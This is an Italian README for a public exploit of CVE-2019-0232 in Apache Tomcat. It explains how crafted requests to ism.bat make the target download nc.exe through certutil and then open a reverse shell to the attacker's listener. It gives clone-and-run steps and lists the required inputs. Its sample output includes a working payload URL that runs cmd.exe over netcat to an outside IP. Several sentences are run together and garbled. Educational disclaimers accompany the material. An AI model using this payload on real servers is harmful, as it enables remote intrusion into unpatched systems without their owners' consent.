
Ciao, questo è un codice rivisto e migliorato per CVE-2019-0232
Questo script sfrutta la vulnerabilità CVE-2019-0232 in Apache Tomcat, che consente l'esecuzione remota di codice attraverso la gestione impropria dello script ism.bat. Lo script utilizza una tecnica di reverse shell tramite certutil e nc.exe (Netcat) per ottenere accesso remoto al sistema vulnerabile.
ism.bat che potrebbe consentire agli attaccanti di eseguire comandi arbitrari sul server. Questa vulnerabilità si verifica a causa della mancanza di una corretta validazione dell'input utente, consentendo agli attaccanti di innescare l'esecuzione di comandi arbitrari tramite una richiesta appositamente predisposta.nc.exenc.exe) deve essere ospitato su un server per la connessione reverse shell.nc.exe: Lo script invia una richiesta appositamente predisposta al server Tomcat vulnerabile per scaricare il file nc.exe (Netcat) sulla macchina target usando certutil.nc.exe, viene inviata un'altra richiesta per eseguire il comando di reverse shell, che si riconnette al listener Netcat dell'attaccante.git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
python3 exploit.py
Target Host: The IP address of the Apache Tomcat server to exploit.
Target Port: The port of the target server (default: 8080).
Server IP: The IP address of the server hosting nc.exe.
Server Port: The port number where nc.exe is hosted (default: 80).
Netcat Listener IP: Your IP address that will receive the reverse shell.
Netcat Listener Port: The port on which you are listening for the reverse shell.
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
Una volta eseguito con successo, dovresti avere una connessione reverse shell verso il tuo listener Netcat.
Questo script è destinato esclusivamente a scopo educativo. Non usarlo per attività malevole. Ottieni sempre la dovuta autorizzazione prima di tentare qualsiasi test di penetrazione o audit di sicurezza. L'uso improprio di questo script potrebbe comportare conseguenze legali.
Assicurati che il server Apache Tomcat non sia stato patchato contro la CVE-2019-0232 prima di utilizzare questo exploit. Lo script potrebbe richiedere privilegi amministrativi a seconda della configurazione del sistema di destinazione.
Autore: A!Z3N(Dharan) Fatto con potenza!
Questo progetto è concesso in licenza sotto la MIT License.
Tuttavia, usalo a tuo rischio. Questo codice è fornito solo a scopo educativo. Usando questo codice, accetti di assumerti la piena responsabilità di qualsiasi azione derivante dal suo utilizzo. L'uso improprio o non autorizzato di questo exploit può portare a conseguenze legali. Ottieni sempre la dovuta autorizzazione prima di eseguire qualsiasi test di sicurezza o test di penetrazione su qualsiasi sistema.
Sei libero di usare, modificare e distribuire questo codice, ma solo per scopi etici. L'autore non è responsabile per eventuali danni causati da questo codice.
Non utilizzare questo exploit senza l'esplicita autorizzazione del proprietario del sistema di destinazione.